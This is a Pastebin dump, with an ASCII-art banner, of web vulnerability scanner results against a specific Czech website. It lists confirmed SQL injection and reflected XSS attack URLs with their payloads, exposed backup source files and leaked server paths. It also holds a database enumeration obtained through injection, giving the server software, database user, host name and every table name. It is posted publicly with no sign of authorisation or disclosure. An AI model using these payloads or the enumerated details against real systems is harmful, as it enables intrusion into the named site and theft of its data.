Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ?????????????????????????????????????????????????????????????????????????????????????
- ??????????????????????????????????????????????????????????????????????????????????????
- ????????????????????????????????????????????????????????????????????????????????????????
- ???????????++?????????????????=:=?????????????~????????????????????????????????????????
- ????????+=~:::~~?????????????+~:????????????+~~???????????????????????????????????????
- ????????+~::??~:=???????????+=::???????????+~:??????????????????????????????????????????
- ????????=~::?+~,????????????=~:???????????+~:???????????????????????+++????????????????
- ????????~::::=???+~=+=???+~~::=????++=:???~:+?????????+=~?????=~~~~~~~:==???????
- ????????~::,????+~::::~?+~::::????=:~::??+::?????????+~:???????+++=~::===+????????????
- ????????~::=????=:=????=~:+~::??+~~::~???=:~????????+~:?????????+~:=++===~????????
- ????????~::?????~:?????~:~~:::?=~::??????~:=??+=+??+~~???+=???+~~=++++==~~=?????
- ????????~::????=:=?????=:::~::?+::~=++~~?=::??~~:??+~~~::??++~~~:::~====~~~????
- ?????????+??????:???????????+::+??+????????=~??????????????+==+++++++==~~~~????????
- ??????????????????????????????????????????????????????????++++++++++==~~~~=?????????
- ????????????????????????????????????????????????????????++++++==++===~~~~:?????????
- ???????????????????????????????????????????????????????+++++===~===~~~~~:+????????
- ?????????????????????????????????????????????????????+++++===~~~~~~~~~~~+??????
- ????????????????????????????????????????????????????+++++===~~~+++~~::~??????????
- ?????????????????????????????????????????????????+++++====~~~~=?III+??????????????
- ???????????????????????????????????????????????+++++===~~~~~:~??I7777I?II????????
- ??????????????????????????????????????????????++++===~~~~~~:=??I7777777IIII?????
- ???????????????????????????????????????????????+====~~~~~:~?????III7I77IIIII?????
- ???????????????????????????????????????????????????+===+???????????III?II7III??????
- ???????????????????????????????????????????????????????????????????IIIIIII????????
- ?????????????????????????????????????????????????????????????????????????????+
- ||| Boolean Based SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- URL: http://press.prdel.cz/data.php3?st=' OR 'ns'='ns
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: st
- Parameter Type: Querystring
- Attack Pattern: ' OR 'ns'='ns
- Severity: Critical
- Confirmation: Confirmed
- URL: http://press.prdel.cz/audit-pridej.php3?id=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- Severity: Critical
- Confirmation: Confirmed
- URL: http://press.prdel.cz/data.php3?st=' OR 'ns'='ns&jmeno=3&prijmeni=3&jedna=3&dve=3&tri=3&autor=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: st
- Parameter Type: Querystring
- Attack Pattern: ' OR 'ns'='ns
- ||| XSS (Cross-site Scripting)
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/prew.php3?st=aaa
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: autor
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0008F3)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/prew.php3?st=aaa
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: dve
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0008F7)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/prew.php3?st=aaa
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: jedna
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0008FB)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/prew.php3?st='"--></style></script><script>alert(0x0008FC)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: st
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0008FC)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/prew.php3?st=aaa
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0008FF)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/prew.php3?st=aaa
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: prijmeni
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000901)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/prew.php3?st=aaa
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: tri
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000903)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/prew.php3?st='"--></style></script><script>alert(0x00090B)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: st
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x00090B)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/prew.php3?st=bush
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00090C)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/prew.php3?st=bush
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: prijmeni
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00090D)</script>
- Severity: Important
- Confirmation : Confirmed
- URL : http://press.prdel.cz/prew.php3?st=bush
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: dve
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00090E)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/prew.php3?st=bush
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: autor
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00090F)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/prew.php3?st=bush
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: jedna
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000910)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/index.php3?poz=20&bc=9'"--></style></script><script>alert(0x00097E)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: bc
- Parameter Type: Querystring
- Attack Pattern: 9'"--></style></script><script>alert(0x00097E)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL : http://press.prdel.cz/data.php3?st=potrat&jmeno='"--></style></script><script>alert(0x0009A3)</script>&prijmeni=3&jedna=3&dve=3&tri=3&autor=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: jmeno
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0009A3)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/data.php3?st=potrat&jmeno=3&prijmeni='"--></style></script><script>alert(0x0009A6)</script>&jedna=3&dve=3&tri=3&autor=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: prijmeni
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0009A6)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/data.php3?st=potrat&jmeno=3&prijmeni=3&jedna='"--></style></script><script>alert(0x0009A8)</script>&dve=3&tri=3&autor=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: jedna
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0009A8)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/data.php3?st=potrat&jmeno=3&prijmeni=3&jedna=3&dve='"--></style></script><script>alert(0x0009AA)</script>&tri=3&autor=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: dve
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0009AA)</script>
- Severity: Important
- Confirmation : Confirmed
- URL: http://press.prdel.cz/data.php3?st=potrat&jmeno=3&prijmeni=3&jedna=3&dve=3&tri=3&autor='"--></style></script><script>alert(0x0009D0)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: autor
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0009D0)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/audit-pridej.php3?chyba=1&prjmeno=warning&prvec=warning&prkomentar=warning&vec='"--></style></script><script>alert(0x000AB2)</script>&komentar=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: vec
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000AB2)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://press.prdel.cz/audit-pridej.php3?chyba=1&prjmeno=warning&prvec=warning&prkomentar=warning&vec=3&komentar='"--></style></script><script>alert(0x000AB3)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: komentar
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000AB3)</script>
- ||| Backup Source Code Found
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL : http://press.prdel.cz/data.php3~
- Vulnerability Classifications: PCI 6.5.10 OWASP A7 CAPEC-87 CWE-425
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://press.prdel.cz/realizace.php3~
- Vulnerability Classifications: PCI 6.5.10 OWASP A7 CAPEC-87 CWE-425
- ||| [Possible] Internal Path Leakage (*nix)
- Severity : Information
- Confirmation : Confirmed
- Vulnerable URL : http://press.prdel.cz/phpinfo.php
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- Identified Internal Path(s):
- /usr/obj/usr/src/sys/GENERIC
- /usr/local/etc/php'
- /usr/local'
- /usr/local/man'
- /usr/local/info/'
- /usr/local/etc
- /usr/local/etc/php.ini
- /usr/local/etc/php
- /usr/local/etc/php/extensions.ini
- /var/log/php_errors.log
- /usr/local/lib/php/20090626
- /usr/local/share/pear
- /usr/sbin/sendmail -t -i
- /usr/sbin/sendmail
- /usr/home/costra/web/prdel.cz/press/phpinfo.php
- /usr/local/bin/php-cgi
- /usr/sbin:/usr/bin
- /usr/home/costra/web/prdel.cz/press
- ||| report db
- Target: http://press.prdel.cz/audit-pridej.php3?id=-1+OR+17-7%3d10
- Web Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2
- Powered-by: PHP/5.3.8
- DB Server: MySQL
- Resp. Time(avg): 5281 ms
- Current User: prdel_cz@localhost
- Sql Version: 5.5.17
- Current DB: prdel_cz
- System User: prdel_cz@localhost
- Host Name: fubar.sigpipe.cz
- Installation dir: /usr/local
- DB User: 'prdel_cz'@'localhost'
- Data Bases: information_schema, prdel_cz, test
- db: prdel_cz
- Tables:
- grossip
- pomozmegrossovi
- prd_ankety
- prd_ankety_odp
- prd_autent
- prd_clanecky
- prd_clanecky_anotace
- prd_clanky_souvis_id
- prd_hororskopy
- prd_kategorie
- prd_koment
- prd_odkazy
- prd_poezie
- prd_poezie_autori
- prd_posta
- prd_pratele
- prd_reg
- prd_rubriky
- prd_soutez
- prdsowclanky
- pressanketa
- pressclanky
- pressdata
- presskomentare
- pressmaily
- ras_koment
- System FreeBSD fubar.sigpipe.cz 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:15:25 UTC 2012 root@obrian.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement